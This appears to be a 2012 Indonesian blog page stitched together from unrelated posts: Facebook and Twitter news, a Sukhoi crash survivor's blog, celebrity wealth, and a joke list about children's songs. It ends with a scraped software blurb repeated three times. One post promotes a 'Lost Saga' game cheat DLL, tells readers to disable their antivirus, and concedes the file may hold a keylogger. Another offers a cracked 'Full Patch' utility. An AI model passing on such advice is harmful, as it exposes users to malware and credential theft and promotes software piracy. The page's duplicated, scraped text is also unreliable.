Facebook akan Cabut Larangan Pengguna di Bawah Umur


Facebook berencana mencabut larangan bagi pengguna di bawah 13 tahun. Langkah ini menurut mereka dilakukan karena banyaknya pengguna di bawah umur yang mendaftar ke situs jejaring sosial tersebut, meski sudah dilarang.
“Terdapat bukti kalau anak di bawah 13 tahun yang berbohong mengenai umur mereka agar bisa masuk ke Facebook,” ungkap Simon Milner, kepala kebijakan untuk Facebook di Inggris, seperti dilansir Guardian, Ahad (20/5). ”Beberapa melakukan itu dengan bantuan dan izin dari  orang tua mereka.”
Awalnya Facebook mengaku menerapkan larangan tersebut atas isu legalitas di Amerika. Peraturan itu pun kemudian diberlakukan di seluruh dunia.
“Kami memberlakukan larangan di bawah 13 tahun karena masalah hukum di Amerika dan kami memberlakukan peraturan yang sama di seluruh dunia,” kata Mill menegaskan. “Namun banyak orangtua justru bahagia anak anak mereka ada di dalamnya (Facebook).”
Keputusan ini menuai kontra. Ada yang menganggap langkah ini bisa meningkatkan potensi Bullying di kalangan anak anak. Facebook juga dituding melakukan pencabutan tersebut semata demi mendongkrak jumlah penggunanya.
Apalagi pengumuman ini datang menyusul langkah perusahaan jejaring sosial menjual saham perdananya sebesar 38 dolar amerika perlembar-yang membuat perusahaan berusia delapan tahun itu akan bernilai lebih dari 100 miliar dolar AS.

Enam Tanda Kecanduan Facebook


Peneliti dari Universitas Bergen, Norwegia, telah mengidentifikasi enam tanda yang menunjukkan seseorang kemungkinan kecanduan Facebook.
Peneliti melakukan tes yang disebut Bergen Facebook Addiction Scale terhadap 423 siswa untuk membantu mengetahui apakah seseorang mengalami kecanduan terhadap media sosial tersebut.
Hasil penelitian menunjukkan enam tanda seseorang kecanduan yakni, menghabiskan banyak waktu untuk berpikir tentang Facebook atau rencana menggunakan Facebook, merasa harus menggunakan terus menerus, dan menggunakan Facebook untuk melupakan persoalan pribadi.
Selain itu adalah merasa gelisah dan kacau jika dilarang menggunakan Facebook, berusaha mengurangi penggunaannya tapi tidak berhasil, dan menggunakan Facebook terlalu banyak hingga berdampak negatif pada pekerjaan atau studi.
“Penggunaan Facebook telah meningkat pesat. Kami berhadapan dengan bagian dari kecanduan internet yang terhubung ke media sosial,” kata Cecilie Schou Andreassen, yang memimpin penelitian tersebut.
Kecanduan ini lebih banyak terlihat diantara kaum muda. Melalui penelitian ini juga ditemukan orang yang cemas dan merasa tidak aman secara sosial menggunakan Facebook lebih banyak, kemungkinan karena mereka merasa lebih mudah untuk berkomunikasi melalui media sosial daripada bertatap muka.
“Perempuan lebih berisiko mengalami kecanduan Facebook, mungkin karena sifat sosial dari Facebook,” kata Andreassen seperti yang dikutip dari laman livescience.
Selain itu, penelitian ini memperlihatkan orang yang terorganisir dan lebih ambisius cenderung tidak kecanduan Facebook. Mereka menggunakan media sosial sebagai bagian integral dari pekerjaan dan jaringan.
Hasil penelitian tentang kecanduan Facebook ini telah dipublikasikan di jurnal “Psychological Reports”.

Facebook Menambahkan Fitur Blokir spam dan Komentar tidak pantas


Sebuah pembaruan dilakukan facebook terhadap situs no satu ini dengan menambahkan fitur anti spam maupun posting yang tidak pantas.
Sensor-Komentar-Facebook
Terkait penambahan fitur anti spam ini facebook mengungkapkan alasannya dibalik update terbaru ini, yakni ingin menciptakan lingkungan yang aman, bersih dan nyaman di jejaring sosial miliknya dengan melakukan sensor terhadap posting kasar atau melecehkan di setiap postingan maupun komentar facebook.
Kasus ini dialami oleh Robert Scoble, seorang penggemar teknologi yang mendapati kesalahan dalam update fitur facebook yang baru ini, Ia berkomentar pada sebuah posting yang ditulis oleh Max Woolf di facebook, namun ketika ia mengirimnya dengan mengklik tombol Post, justru muncul pesan peringatan :
“This comment seems irrelevant or inappropriate and can’t be posted. To avoid having comments blocked, please make sure they contribute to the post in a positive way.”

Yang mengherankan, komentar yang ditulis oleh Robert Scoble ini sama sekali tidak mengandung kata-kata kotor, bahkan Robert Scoble juga memposting komentar yang sama di laman Google+ dan tidak ada masalah disana. Entah parameter dan algoritma apa yang telah digunakan Facebook pada fitur antispamnya ini, serta penerapan sensor pada apa yang diposting oleh penggunannya.

Facebook yang mengetahui perihal komentar atas kesalahan fitur tersebut langsung memberi tanggapannya dengan menulis di blog probadi facebook.
“Untuk melindungi jutaan pengguna yang terhubung dengan Facebook, kami memiliki sistem otomatis yang bekerja di balik layar untuk menjaga dan melindungi pengguna dari aksi buruk, spamming atau malware.”
“Sistem ini sangat efektif sihingga kebanyakan pengguna Facebook terhindar dari spam. Komentar buruk, spam dan kata-kata kotor akan kami blokir. Kami telah belajar dari kesalahan masa lalu dan kami melakukan hal ini agar tidak mengulangi kesalahan yang sama di masa mendatang,” kata juru bicara Facebook.
Dengan adanya update tersebut sepertinya sang pemilik jejaring sosial no satu ini sudah mulai memperhatikan apa yang diposting pengguna, jadi ada baiknya berhati-hati dengan apa yang Anda posting di Facebook.

Pembaca kami juga menyukai

5 Kesalahan di Twitter yang Harus Dihindari


Twitter menjadi salah satu jejaring sosial paling digemari saat ini. Penggunaannya pun tak sekadar untuk kesenangan pribadi, namun juga keperluan bisnis alias untuk urusan perusahaan atau produk tertentu.
Hanya saja, terkadang tweeps kerap lupa akan sejumlah hal kala berkicau di Twitter. Alhasil, kesalahan yang tak seharusnya terjadi malah mereka buat. Seperti 5 kesalahan berikut yang dirangkum detikINET dari berbagai sumber.
1. Pribadi vs Pekerjaan
Urusan pekerjaan dan personal tidak bisa dicampuradukan dalam satu akun di Twitter. Sebab hal ini akan mengganggu satu sama lain. Jika Anda seorang wirausaha, sedianya memiliki satu akun khusus untuk produk yang digeluti. Di sisi lain, tetap menjaga kehidupan pribadi dengan memiliki akun personal.
Nah, dengan cara ini, Anda tentu dapat memisahkan mana yang merupakan urusan pekerjaan ataupun keperluan pribadi. Dengan dipisahkan, keduanya tidak akan saling mengganggu.
2. Informasi vs Spam
Mengelola suatu akun produk/perusahaan tidak berarti harus selalu menjejali para follower dengan kicauan seputar produk tersebut. Sebab, bisa jadi para pengikut tersebut akan bosan dan menganggap akun Anda adalah spammer (penyebar pesan sampah).
Jika ingin lebih ‘bernilai’, ada baiknya akun tersebut juga memberikan informasi lain yang menarik. Bisa juga dengan memberikan tips dan trik sederhana, serta menjaga komunikasi yang baik dengan para follower.
3. Topik Kontroversial
Jika Anda mengelola akun suatu produk/perusahaan, sebaiknya menghindari berkicau soal topik yang kontroversial. Sebab isu panas ini bisa menyulut ‘tweet war‘ dari follower.
Isu kontroversial yang dimaksud mulai dari urusan politik, agama, hingga rasisme. Fokuslah kepada bidang Anda!
4. Usaha ‘Satu Malam’
Twitter saat ini menjadi salah satu corong dalam menyampaikan pesan marketing komunikasi. Bisa juga merintis basis komunitas lewat layanan
mikroblogging ini.
Hanya saja itu tidak bisa dilakukan dalam ‘satu malam’. Butuh keuletan dan usaha agar dapat mencapai hasil maksimal dari Twitter. Artinya, bagi mereka yang sifatnya angin-anginan silakan memupuk lagi semangat yang ada.
5. Bukan Robot
Di balik akun Twitter itu terdapat seorang admin sebagai pengelolanya. Namun admin di sini bukanlah seorang robot yang tidak memiliki sifat manusiawi.
Maksudnya sikap yang ditonjolkan pun tidak bisa datar-datar saja, harus bisa melakukan interaksi dengan follower. Termasuk ketika menyampaikan informasi, jangan menggelontorkan informasi yang terlalu banyak bak sebuah mesin.

Permutakhiran Fitur Pencarian Di Twitter


Twitter mengatakan, baru saja meluncurkan koreksi ejaan dan fitur terkait untuk pencarian. Sejak dua pekan perilisan, situs microblogging tersebut telah memberikan 5 juta koreksi ejaan dan 100 juta permintaan pencarian yang disarankan.
"twitter perbarui fitur pencarian"
Pencarian memang telah menjadi fokus besar untuk Twitter sejal awal. Twitter membeli perusahaan pencarian Summize pada 2008, sebagai salah satu cara memperbaiki masalah tentang pencarian di situsnya.
“Seperti yang mungkin Anda telah sadari, selain menampilkan hasil pencarian di twitter.com, Twitter untuk iOS dan Twitter untuk Android, kini pencarian juga memiliki koreksi ejaan dan pertanyaan terkait,” ujar tim pengembang Twitter, seperti dilansir dari The Next Web, Sabtu (12/5/2012).
Menurut tim pengembang, koreksi ejaan Twitter memiliki sejumlah tantangan yang unik. “Pencari sering mengetik nama pengguna atau hastag (#) bukan dengan bahasa Inggris yang baik,” tambahnya.
“kami selalu berusaha memuaskan para user twiter diseluruh dunia sehingga terwujud sebuah permuktahiran di bagian sistem pencarian di twiiter sehingga orang akan mudah menemukan apa yang sedang mereka cari di saat itu juga.” ujar Evan Williams
“twitter yang makin populer 3 tahun belakangan ini membuat para pekerja di bagian pengembangan twitter secara terus – menerus bekerja demi mewujudkan kenyamanan dari user twitter di seluruh dunia”. tambahnya.
Bukan hanya memperbarui fitur pencarian, Twitter juga berencana menghadirkan banyak fitur dalam waktu dekat ini. Fitur tersebut, kabarnya akan membuat pengguna lebih mudah mencari dan menemukan konten.

Kisah Blogger Rusia yang Selamat dari Sukhoi


Sergey Dolya sungguh beruntung. Wartawan dan sekaligus blogger asal Rusia itu ikut dalam penerbangan pesawat Sukhoi yang nahas Rabu 9 Mei 2012, pekan lalu. Tapi dia cuma itu dalam joy flight yang pertama. Dia membatalkan niatnya untuk ikut pada penerbangan kedua. Dia kemudian mengisahkan pengalamannya lewat blog Live Journal.
Kisah Sergey Doyla ini ramai di tulis media massa Rusia. Blog ini kemudian sangat populer di Rusia sesudah kecelakaan Sukhoi di Gunung Salak itu.
“Saya banyak bepergian dan memotret,” tulis Sergey Dolya dalam blog itu.
Ketika pesawat malang SSJ 100 terbang kali kedua, Dolya tidak ikut di dalamnya. Dia memilih tinggal di Lanud halim untuk memotret pesawat Rusia itu lepas landas. Keputusan terbaik dalam hidupnya.
Dolya membagi kisah indah terbang bersama SSJ 100. Perjalanannya bersama Sukhoi melewati tiga negara; Kazakhstan, Pakistan, dan Myanmar. Blogger Rusia ini membagi pula perjalanannya melintasi ekuator. Tawa dan canda terlihat dalam pesawat.
Selama persimpangan khatulistiwa, mereka menggelar perayaan Neptunus. Dolya berjalan dalam pesawat dengan bertelanjang dada, mengenakan jenggot putih palsu, dan memegang trisula. Pada 8 Mei itu Dolya memajang fotonya berkostum Neptunus. Bahkan, pilot pesawat pun tampak tertawa dan memotret tingkah kocak Dolya. Semua berpesta dengan disuguhi sampanye saat itu.
Dolya memamerkan pertemuannya dengan “selusin pramugari lokal” ketika tiba di Indonesia. Dia merasa bingung ketika dikelilingi orang-orang yang berbincang dengan bahasa Indonesia.
Setelah bersenang-senang dengan Sukhoi, Dolya menerima kabar buruk mengenai SSJ 100 yang hilang kontak. Perkembangan informasi mengenai pesawat itu pun ditulisnya pada akun Twitter @dolyasergey. Dia terus mengabarkan hingga proses evakuasi.
Bantah Isu
Pada blognya, Dolya juga membantah diskusi pada forum Airliners.net mengenai tombol Sistem Perkiraan Peringatan Dini yang mati.
Foto yang dimuat Dolya memperlihatkan tombol peringatan bahaya pada SSJ100 dalam posisi mati (off). Dolya pun memberikan klarifikasi pada 12 Mei 2012.

Foto yang dia ambil itu tercatat waktu: 5 jam 45 menit 53 detik hingga 29 detik. Sementara tombol yang tampak mati itu mulai menyala pada 5 jam 45 menit dan 24 detik. Superjet dirancang sedemikian rupa sehingga dalam waktu kisaran 35 detik baru tombol menyala. Sistem ini seperti menyalakan PC yang tidak dapat langsung hidup seketika.
Menurut Dolya, indikator tombol menyala ini persoalan standar untuk 35 detik pertama. Pada foto yang diambil 9 jam 7 menit dan 22 detik sebelum demonstrasi terbang yang kedua, terlihat jelas tombol itu telah diaktifkan.
Kabar 140 karakter senantiasa diperbaruinya dengan terus memantau informasi seputar pesawat malang Sukhoi Superjet 100. Kini waktu Dolya disibukkan untuk menulis status terbaru pada akun Twitter-nya. Bahkan, Dolya menulis dia tidak punya waktu menulis panjang di blog.
“Ini tidak ditulis dalam waktu yang lama. Tidak ada waktu. Semua informasi terbaru tentang saya ada di Twitter,” tulisnya pada Sergeydolya.livejournal.com.

Penghasilan Sule 1 Milyar Per Bulan


Komedian asal Bandung, Jawa Barat, Sule masuk dalam kategori aktris terkaya. Tercatat, dia memiliki tujuh rumah mewah di Jakarta dan Bandung.
" Penghasilan Sule 1 Milyar Per Bulan"
Cerita mengenai Entis Sutisna (Sule) memang tak ada habisnya. Sebagai komedian tersukses, karier Sule kian bersinar, mulai dari melawak, bernyanyi, bermain film, hingga bintang iklan. Dari penghasilannya itu, Sule dapat menambah setidaknya Rp1 milyar per bulan. Wajar bila Sule masuk dalam kategori aktor terkaya.
Sekilas, kondisi itu dapat terlihat dari mobil mewah yang dibawanya. Tapi di balik itu, kekayaan Sule meliputi tujuh rumah mewah di Jakarta dan Cimahi, Bandung. Saat ditanya kebenarannya, Sule tak membantah hal tersebut.
“Sebetulnya bisa dikatakan itu invest, tapi itu secara kebetulan juga, menolong orang juga. Kayak yang di Cicalengka, istilahnya dia pinjam uang terus bayar pakai rumah. Ya sudah tiga, empatlah yang di Cicalengka. Di Panyalawengan satu, di Cimahi dua. Tapi kalau yang di Jakarta itu saya suka bentuknya, terus pas ditawari saya suka nomornya 16, enam tambah satu tujuh, saya suka nomor tujuh,” kata pria 36 tahun itu.
Total, hanya Sule sendiri yang mengetahui pasti berapa jumlah harta kekayaannya. Selain rumah, investasi anak tukang bakso ini pun berupa tanah.
“Alhamdulillah di Subang juga saya ada, 2.800 meterlah. Cuma saya belum lihat sampai sekarang. Gue harus banyak tanah buat entar, memang bagus seperti itu, tapi kita tergantung bagaimana me-managenya. Kalau kita beliin banyak tanah, tapi tidak bisa mengurusnya, belum bayar ini itu, maksudnya step by step,” jelasnya.
Sule pun memberi modal sang istri, Lina, untuk membangun kerajaan bisnis. “Dia membuat salon, dia bikin sketsel, kayak nyewa-nyewain kursi untuk orang hajatan. Kadang beli sembako, kayak buat skincare, tahulah itu urusan cewek. Ya saya sih positif, walaupun mengeluarkan uang banyak, tapi untuk masa depan,” tutupnya.

Facebook Camera Hanya Sementara

Setelah mengakusisi Instagram, Facebook justru meluncurkan aplikasi pengeditan foto iPhone yang mirip dengan Instagram. Lalu bagaimana nasib Instagram setelah Facebook meluncurkan aplikasi tersebut?
"facebook camera hanya sementara"
Facebook Camera disebut sebagai bagian usaha Facebook meningkatkan pengalaman mobile-nya, dengan memungkinkan pengguna menambah filter untuk foto mereka sebelum diunggah ke jejaring sosial tersebut.
Meski baru diluncurkan, aplikasi ini mendapatkan kritikan karena kemiripannya dengan Instagram, yang baru saja diakuisisi Facebook senilai USD1 miliar. Namun karena Facebook belum bisa menutup kesepakatan akuisisi hingga akhir tahun ini, Facebook Camera dianggap sebagai pengganti Instagram.
Hadirnya Facebook Camera, bukan berarti Facebook nantinya akan “membunuh” Instagram. Aplikasi Camera ini tidak memiliki beberapa fitur penting yang ada di Instagram, seperti pilihan untuk menambahkan bingkai foto.
Analis utama di Ovum Eden Zoller mengatakan, Facebook Camera merupakan langkah penting dalam rencana Facebook meningkatkan kehadirannya di mobile. “Mobile memberikan peluang untuk Facebook memperluas jangkauan dan keterlibatan dengan konsumen, dan peluncuran Facebook Camera merupakan upaya untuk menunjukkan sikap proaktif,” ujar Zoller, dikutip dari The Inquirer, Sabtu (26/5/2012).
Namun menurut Zoller, Facebook Camera bukan aplikasi yang inovatif karena mirip dengan Instagram. Terlebih lagi, Facebook Camera hadir setelah beredarnya kabar bahwa akuisisi Instagram oleh Facebook kemungkinan tertunda selama 12 bulan.
“Sementara itu, Facebook memerlukan akses ke aplikasi berbagi foto yang lebih baik. Pada saat akuisisi selesai, tidak akan ada yang bisa menghentikan Facebook yang dengan tenangnya menggabungkan aplikasi Camera ke dalam Instagram,” ungkapnya.

Kamis, 24 Mei 2012

Cheat LS Lost Saga 24 Mei 2012 Terbaru

Cheat LS Lost Saga Terbaru 24 Mei 2012 Cheat Lost Saga 24 Mei 2012. Cheat Lost Saga 24 Mei 2012 Kali ini akan sedikit berbagi seputer Cheat Game Online yaitu Lost Saga. Berikut ini CHEAT LOST SAGA 24 Mei Terbaru 2012 adalah  Cheat Lost Saga LS 24 Mei 2012 Skill No delay



http://3.bp.blogspot.com/-3FC4R-I9BUY/Tp_Njv2XBqI/AAAAAAAAAH0/7juQUARx1yA/s200/Lost+Saga.jpgCheat Lost Saga LS 24 Mei 2012 Skill No delay
Thanks To :
[*]N2 Vip member

Credit : YoniYjm

Fitur Cheat Vip Member Lost Saga
* Skil No Delay
* Low Damage/Unlimeted HP
* 1 Hit Crussade
* Menu D3D


Cara Pakai :
* Buka Ls
* Buka Perx
* Browse
* Masukkan DLL
* Play LS
* On kan saat Notice Terakhir

F2 = 1 Hit Crussade
F1 = Skil No delay

Unlimited HP = Auto On

Work : windows Xp dan Windows 7

Virus Total


Jika Gak bekerja :

* Lengkapi jamu2 nya
* Matikan Antivirus karena Dll nya di anggap virus padahal cuma false alarm
* Restart Komputer
* Coba Pakai Injector lain

Download : Disini

NB :
- Silahkan Scan Ulang, dan ane gak tanggung jawab kalo ada keylogernya...
Demikianlah Cheat Lost Saga LS 24 Mei 2012 Terbaru Hari Ini semoga dapat bermanfaat bagi para Cheaters.

Minggu, 20 Mei 2012

Hard Drive Inspector 3.98 Pro Full Patch


Hard Drive Inspector 3.98 Pro Full Patch adalah sebuah aplikasi pengecek kondisi, suhu sebuah harddisk laptop/ PC. Kamu bisa liat bagaimana kondisi harddiskmu apakah dalam kondisi baik atau buruk.


Hard Drive Inspector 3.98 Requirements:MS Internet Explorer 4.0 or higher
  • Intel 486DX with 32 MB RAM
  • 5 MB free disk space
  • An ATA S.M.A.R.T.-capable hard disk drive
  • A mouse
  • 16-color VGA Card (High Color recommended).



Hard Drive Inspector 3.98 What's new
  • added the support the Toshiba Stor.E Steel series external drives
  • added the support the Seagate Expansion external drives

Download : Hard Drive Inspector 3.98 Pro Full Patch | File Size : 3MB

Referensi : http://4-jie.blogspot.com

Waspada Terhadap Lagu Anak - Anak !!



"Balonku ada 5...rupa-rupa warnanya...
merah, kuning, kelabu...merah muda dan
biru...meletus balon hijau, dorrrr!!!"

Perhatikan warna-warna kelima balon tersebut, kenapa tiba-tiba muncul warna hijau? Jadi jumlah balon sebenarnya ada 6, bukan 5!

"Aku seorang kapiten...mempunyai pedang
panjang...kalo berjalan prok...prok...
prok...aku seorang kapiten!"

Perhatikan di bait pertama dia cerita tentang pedangnya, tapi di bait kedua dia cerita tentang sepatunya(inkonsistensi). Harusnya dia tetap konsisten, misal jika ingin cerita tentang sepatunya seharusnya dia bernyanyi:
"mempunyai sepatu baja(bukan pedang panjang)
...kalo berjalan prok..prok...prok.."
Nah, itu baru klop!
jika ingin cerita tentang pedangnya, harusnya dia bernyanyi:
"mempunyai pedang panjang...kalo berjalan
ndul..gondal. .gandul...atau srek...srek...srek..."

Itu baru sesuai dengan kondisi pedang panjangnya.

"Bangun tidur ku terus mandi...tidak
lupa menggosok gigi...habis mandi ku
tolong ibu...membersihkan tempat tidurku..."

Perhatikan setelah habis mandi langsung membersihkan tempat tidur. Lagu ini membuat anak-anak tidak bisa terprogram secara baik dalam menyelesaikan tugasnya dan selalu terburu-buru. Sehabis mandi seharusnya si anak pakai baju dulu dan tidak langsung membersihkan tempat tidur dalam kondisi basah dan telanjang.

"Naik-naik ke puncak gunung...tinggi...
tinggi sekali..kiri kanan kulihat saja...
banyak pohon cemara..."

Lagu ini dapat membuat anak kecil kehilangan konsentrasi, semangat dan motivasi. Pada awal lagu terkesan semangat akan mendaki gunung yang tinggi tetapi kemudian ternyata setelah melihat jalanan yang tajam mendaki lalu jadi bingung dan gak tau mau berbuat apa, bisanya cuma noleh ke kiri ke kanan aja, gak maju-maju.

"Naik kereta api tut..tut..tut. . siapa
hendak turut ke Bandung...Surabaya...bolehlah
naik dengan naik percuma..ayo kawanku
lekas naik...keretaku tak berhenti lama"

Nah, yang begini ini yang parah! mengajarkan anak-anak kalo sudah dewasa maunya gratis melulu. Pantesan PT. KAI rugi terus! terutama jalur Bandung dan Surabaya!

"Di pucuk pohon cempaka...burung
kutilang berbunyi...bersiul-siul sepanjang
hari dengan tak jemu-jemu..mengangguk-angguk sambil
bernyanyi tri li li..li..li...li..li.."

Ini juga menyesatkan dan tidak mengajarkan kepada anak-anak akan realita yang sebenarnya. Burung kutilang itu kalo nyanyi bunyinya cuit..cuit...cuit ! kalo tri li li li li itu bunyi kalo yang nyanyi orang (catatan: acara lagu anak-anak dengan presenter Agnes Monica waktu dia masih kecil adalah Tra la la tri li li!), bukan burung!

"Pok ame ame...belalang kupu-kupu...siang
makan nasi, kalo malam minum susu..."

Ini jelas lagu dewasa dan tidak konsumsi anak-anak. karena yang disebutkan di atas itu adalah kegiatan orang dewasa, bukan anak kecil. Kalo anak kecil, karena belom boleh maem nasi, jadi gak pagi gak malem ya minum susu!

"Nina bobo nina bobo oh nina bobo...
kalau tidak bobo digigit nyamuk"

Menurut psikolog: jadi sekian tahun anak-anak Indonesia diajak tidur dengan lagu yang penuh nada mengancam.

"Bintang kecil di langit yang biru..."
Bintang khan adanya malem, lah...kalo malem bukannya langit warnanya hitam!!?

"Ibu kita Kartini...harum namanya"
Namanya Kartini apa Harum sih?!!

"Pada hari minggu..naik delman istimewa
ku duduk di muka"

Nah, gak sopan khan!

"Cangkul-cangkul, cangkul yang dalam,
menanam jagung di kebun kita..."

kalo mau nanam jagung, ngapain dalam-dalam, emang mo bikin sumur!?

Dengan software ini kita tidak hanya bisa mengatur shut down, tapi bisa juga untuk mengatur waktu restart dan log off, ukuran software ini kecil hanya sekitar 531.5KB Ok, Download PC TIMER Disini !!!

Original Article from: http://utuy-semrawut.blogspot.com/2011/04/shut-down-timer-untuk-mengatur-waktu.html
Copyright Utuy-SemrawutDengan software ini kita tidak hanya bisa mengatur shut down, tapi bisa juga untuk mengatur waktu restart dan log off, ukuran software ini kecil hanya sekitar 531.5KB Ok, Download PC TIMER Disini !!!

Original Article from: http://utuy-semrawut.blogspot.com/2011/04/shut-down-timer-untuk-mengatur-waktu.html
Copyright Utuy-SemrawutDengan software ini kita tidak hanya bisa mengatur shut down, tapi bisa juga untuk mengatur waktu restart dan log off, ukuran software ini kecil hanya sekitar 531.5KB Ok, Download PC TIMER Disini !!!

Original Article from: http://utuy-semrawut.blogspot.com/2011/04/shut-down-timer-untuk-mengatur-waktu.html
Copyright Utuy-Semrawut